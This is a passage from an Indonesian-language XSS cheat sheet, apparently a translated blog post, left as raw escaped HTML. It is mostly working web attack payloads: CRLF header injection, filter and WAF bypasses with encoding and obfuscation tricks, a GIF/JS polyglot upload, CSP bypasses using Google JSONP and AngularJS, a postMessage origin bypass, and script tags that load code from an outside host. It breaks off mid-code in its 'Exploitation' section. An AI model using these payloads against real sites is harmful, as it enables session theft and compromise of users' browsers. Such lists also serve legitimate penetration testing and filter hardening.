&amp;lt;x ng-app&amp;gt;{{constructor.constructor(&#39;alert(1)&#39;)()}}&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Injeksi CRLF&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan saat aplikasi merefleksikan input di salah satu header respons, memungkinkan injeksi&lt;/div&gt;&lt;div&gt;karakter Carriage Return (%0D) dan Line Feed (%0A). Vektor untuk Tokek dan Webkit,&lt;/div&gt;&lt;div&gt;masing-masing.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0A%0D%0A
%3Cscript%3Ealert(1)%3C/script%3E
%0D%0ALocation:%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection
%3a0%0D%0A%0D%0A%3Cscript%3Ealert(1)%3C/script%3E&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;Lewati Filter&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Campuran Kasus XSS&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan untuk mengabaikan filter peka huruf besar/kecil.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&amp;lt;Svg OnLoad=alert(1)&amp;gt;
&amp;lt;Script&amp;gt;alert(1)&amp;lt;/Script&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Tag Tidak Tertutup&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan dalam injeksi HTML untuk menghindari pemfilteran berdasarkan adanya tanda lebih rendah dari (&amp;lt;) dan lebih besar dari (&amp;gt;). Ini membutuhkan kode sumber asli yang lebih besar dari tanda masuk setelah refleksi masukan.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&amp;lt;svg onload=alert(1)//
&amp;lt;svg onload=&quot;alert(1)&quot;&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;XSS huruf besar&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan saat aplikasi mencerminkan input dalam huruf besar.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&amp;lt;SVG ONLOAD=&amp;amp;#97&amp;amp;#108&amp;amp;#101&amp;amp;#114&amp;amp;#116(1)&amp;gt;
&amp;lt;SCRIPT SRC=//HACKERINTHEHOUSE.IN/1&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Konten Ekstra untuk Tag Skrip&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan saat filter mencari “&amp;lt;script&amp;gt;” atau “&amp;lt;script src=…” dengan beberapa variasi tetapi tanpa&lt;/div&gt;&lt;div&gt;memeriksa atribut lain yang tidak dibutuhkan.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&amp;lt;script/x&amp;gt;alert(1)&amp;lt;/script&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;XSS Bersandi Ganda&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan saat aplikasi melakukan decoding input ganda.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
%2522%253E%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Lansiran tanpa Tanda Kurung (Hanya String)&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan dalam vektor HTML atau injeksi javascript ketika tanda kurung tidak diperbolehkan dan&lt;/div&gt;&lt;div&gt;kotak peringatan sederhana sudah cukup.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;alert`1`&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Lansiran tanpa tanda kurung&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan dalam vektor HTML atau injeksi javascript ketika tanda kurung tidak diizinkan dan PoC&lt;/div&gt;&lt;div&gt;perlu mengembalikan info target apa pun.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;setInterval`alert\x28document.domain\x29`
setTimeout`alert\x28document.domain\x29`&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Lansiran tanpa tanda kurung (Tag Eksklusif)&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan hanya dalam injeksi HTML jika tanda kurung tidak diperbolehkan. Ganti “&amp;amp;” dengan “%26” di URL.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&amp;lt;svg onload=alert&amp;amp;lpar;1&amp;amp;rpar;&amp;gt;
&amp;lt;svg onload=alert&amp;amp;#40;1&amp;amp;#41&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Lansiran tanpa Karakter Abjad&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan saat karakter alfabet tidak diperbolehkan. Berikut adalah waspada(1).&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;[][&#39;\146\151\154\164\145\162&#39;][&#39;\143\157\156\163\164\162\165\143\164\157\162&#39;]
(&#39;\141\154\145\162\164\50\61\51&#39;)()&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Kebingungan Peringatan&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan untuk mengelabui beberapa filter ekspresi reguler (regex). Ini mungkin digabungkan dengan&lt;/div&gt;&lt;div&gt;alternatif sebelumnya (di atas). Opsi terpendek &quot;top&quot; juga dapat diganti dengan &quot;window&quot;, &quot;parent&quot;,&lt;/div&gt;&lt;div&gt;&quot;self&quot; atau &quot;this&quot; tergantung pada konteksnya.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;(alert)(1)
a=alert,a(1)
[1].find(alert)
top[&quot;al&quot;+&quot;ert&quot;](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top[&#39;al\145rt&#39;](1)
top[8680439..toString(30)](1)&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Injeksi Pengunggahan File – Penyamaran GIF HTML/js&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan untuk melewati CSP melalui unggahan file. Simpan semua konten di bawah sebagai &quot;xss.gif&quot; atau &quot;xss.js&quot; (untuk pemeriksaan MIME yang ketat). Itu dapat diimpor ke halaman target dengan &amp;lt;link rel=import href=xss.gif&amp;gt; (juga “xss.js”) atau &amp;lt;script src=xss.js&amp;gt;&amp;lt;/script&amp;gt;. Ini gambar/gif untuk PHP.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;GIF89a=//&amp;lt;script&amp;gt;
alert(1)//&amp;lt;/script&amp;gt;;&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Lompat ke Fragmen URL&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan saat Anda perlu menyembunyikan beberapa karakter dari payload Anda yang akan memicu WAF misalnya. Itu menggunakan format payload masing-masing setelah fragmen URL (#).&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;eval(URL.slice(-8)) #alert(1)
eval(location.hash.slice(1)) #alert(1)
document.write(decodeURI(location.hash)) #&amp;lt;img/src/onerror=alert(1)&amp;gt;
* (Webkit only)
&amp;lt;svg/onload=innerHTML=location.hash&amp;gt; #&amp;lt;img/src/onerror=alert(1)&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Pemisah Alternatif HTML&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan saat spasi default tidak diizinkan. Garis miring dan tanda kutip (tunggal atau ganda) mungkin&lt;/div&gt;&lt;div&gt;juga disandikan URL (masing-masing %2F, %27 dan %22), sedangkan tanda plus (+) hanya dapat digunakan di URL. Skema Tag:&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&amp;lt;name [1] attrib [2] = [3] value [4] handler [5] = [6] js [7]&amp;gt;
[1], [2], [5] =&amp;gt; %09, %0A, %0C, %0D, %20, / and +
[3] &amp;amp; [4] =&amp;gt; %09, %0A, %0C, %0D, %20, + and &#39; or &quot; in both
[6] &amp;amp; [7] =&amp;gt; %09, %0A, %0B, %0C, %0D, %20, /, + and &#39; or &quot; in both&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Bypass Berbasis Tag Strip&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan saat filter menghapus apa pun di antara karakter &amp;lt; dan &amp;gt;. Injeksi inline saja.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&quot;o&amp;lt;x&amp;gt;nmouseover=alert&amp;lt;x&amp;gt;(1)//
&quot;autof&amp;lt;x&amp;gt;ocus o&amp;lt;x&amp;gt;nfocus=alert&amp;lt;x&amp;gt;(1)//&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Injeksi XSS Orde Kedua&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan saat input Anda akan digunakan dua kali, seperti disimpan dinormalisasi dalam database dan kemudian diambil untuk digunakan nanti atau dimasukkan ke dalam DOM.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&amp;amp;lt;svg/onload&amp;amp;equals;alert(1)&amp;amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Bypass Asal Peristiwa untuk postMessage() XSS&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan saat pemeriksaan asal dapat dilewati dalam kode target javascript dengan menambahkan salah satu asal yang diizinkan sebagai subdomain dari domain penyerang yang akan mengirim muatan.&lt;/div&gt;&lt;div&gt;Contoh memanfaatkan skrip Crosspwn (tersedia di bagian Miscellaneous) di localhost.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;http://facebook.com.localhost/crosspwn.php?
target=//hackerinthehouse.in/tests/status.html&amp;amp;msg=&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Bypass CSP (untuk Google Domains yang Dimasukkan ke Daftar Putih)&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan jika ada CSP (Content-Security Policy) yang mengizinkan eksekusi dari domain ini.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&amp;lt;script src=https://www.google.com/complete/search?client=chrome%26jsonp=alert(1);&amp;gt;
&amp;lt;/script&amp;gt;
&amp;lt;script src=https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.min.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;x 
ng-app ng-csp&amp;gt;{{constructor.constructor(&#39;alert(1)&#39;)()}}&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Vektor tanpa Event Handler&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan sebagai alternatif untuk penangan acara, jika tidak diizinkan. Beberapa memerlukan interaksi pengguna sebagaimana dinyatakan dalam vektor itu sendiri (juga bagian darinya).&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;
&amp;lt;script src=data:,alert(1)&amp;gt;
&amp;lt;iframe src=javascript:alert(1)&amp;gt;
&amp;lt;embed src=javascript:alert(1)&amp;gt;
&amp;lt;a href=javascript:alert(1)&amp;gt;click
&amp;lt;math&amp;gt;&amp;lt;brute href=javascript:alert(1)&amp;gt;click
&amp;lt;form action=javascript:alert(1)&amp;gt;&amp;lt;input type=submit&amp;gt;
&amp;lt;isindex action=javascript:alert(1) type=submit value=click&amp;gt;
&amp;lt;form&amp;gt;&amp;lt;button formaction=javascript:alert(1)&amp;gt;click
&amp;lt;form&amp;gt;&amp;lt;input formaction=javascript:alert(1) type=submit value=click&amp;gt;
&amp;lt;form&amp;gt;&amp;lt;input formaction=javascript:alert(1) type=image value=click&amp;gt;
&amp;lt;form&amp;gt;&amp;lt;input formaction=javascript:alert(1) type=image src=SOURCE&amp;gt;
&amp;lt;isindex formaction=javascript:alert(1) type=submit value=click&amp;gt;
&amp;lt;object data=javascript:alert(1)&amp;gt;
&amp;lt;iframe srcdoc=&amp;lt;svg/o&amp;amp;#x6Eload&amp;amp;equals;alert&amp;amp;lpar;1)&amp;amp;gt;&amp;gt;
&amp;lt;svg&amp;gt;&amp;lt;script xlink:href=data:,alert(1) /&amp;gt;
&amp;lt;math&amp;gt;&amp;lt;brute xlink:href=javascript:alert(1)&amp;gt;click&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Vektor dengan Penangan Peristiwa Agnostik&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan vektor berikut jika semua nama tag HTML yang dikenal tidak diizinkan. Karakter atau string abjad apa pun dapat digunakan sebagai nama tag sebagai pengganti &quot;x&quot;. Mereka membutuhkan interaksi pengguna seperti yang dinyatakan oleh konten teks mereka sendiri (yang juga menjadi bagian dari vektor).&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&amp;lt;x contenteditable onblur=alert(1)&amp;gt;lose focus!
&amp;lt;x onclick=alert(1)&amp;gt;click this!
&amp;lt;x oncopy=alert(1)&amp;gt;copy this!
&amp;lt;x oncontextmenu=alert(1)&amp;gt;right click this!
&amp;lt;x oncut=alert(1)&amp;gt;copy this!
&amp;lt;x ondblclick=alert(1)&amp;gt;double click this!
&amp;lt;x ondrag=alert(1)&amp;gt;drag this!
&amp;lt;x contenteditable onfocus=alert(1)&amp;gt;focus this!
&amp;lt;x contenteditable oninput=alert(1)&amp;gt;input here!
&amp;lt;x contenteditable onkeydown=alert(1)&amp;gt;press any key!
&amp;lt;x contenteditable onkeypress=alert(1)&amp;gt;press any key!
&amp;lt;x contenteditable onkeyup=alert(1)&amp;gt;press any key!
&amp;lt;x onmousedown=alert(1)&amp;gt;click this!
&amp;lt;x onmousemove=alert(1)&amp;gt;hover this!
&amp;lt;x onmouseout=alert(1)&amp;gt;hover this!
&amp;lt;x onmouseover=alert(1)&amp;gt;hover this!
&amp;lt;x onmouseup=alert(1)&amp;gt;click this!
&amp;lt;x contenteditable onpaste=alert(1)&amp;gt;paste here!&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Komentar Alternatif Javascript&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan ketika komentar javascript biasa (garis miring ganda) tidak diperbolehkan, lolos atau dihapus.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&amp;lt;!--
%0A--&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;&lt;b&gt;Eksploitasi&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Panggilan Skrip Jarak Jauh&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan saat Anda perlu memanggil skrip eksternal tetapi vektor XSS Anda berbasis penangan&lt;/div&gt;&lt;div&gt;(seperti &amp;lt;svg onload=) atau dalam injeksi javascript. Domain &quot;brutelogic.com.br&quot; bersama dengan&lt;/div&gt;&lt;div&gt;file HTML dan js digunakan sebagai contoh.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;1. Berbasis HTML (respons harus berupa HTML dengan&lt;/div&gt;&lt;div&gt;header Access-Control-Allow-Origin (CORS))&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&quot;var x=new 